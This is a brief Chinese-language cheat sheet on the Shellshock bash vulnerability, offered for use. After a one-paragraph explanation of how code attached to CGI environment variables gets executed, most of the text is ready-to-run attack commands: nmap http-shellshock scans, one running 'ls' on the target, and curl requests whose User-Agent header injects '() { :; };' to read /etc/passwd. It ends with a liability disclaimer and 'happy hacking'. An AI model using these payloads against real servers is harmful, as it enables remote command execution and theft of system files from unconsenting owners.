Shellshock 实际上是一个存在于 BASH 中的远程命令执行漏洞。该脚本利用启用了 mod_cgi 的 Apache 或类似 Web 环境中的漏洞。漏洞的核心在于对环境变量的操控,环境变量是影响计算机上进程运行的动态命名值。攻击者可通过将恶意代码附加到环境变量中来利用此漏洞,这些代码会在收到变量时被执行。这使攻击者有可能破坏系统。
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
我不对该工具的任何非法使用或造成的损害负责。编写它只是为了乐趣,而非恶意,旨在提高人们对黑客攻击和网络安全的意识
黑客愉快 :)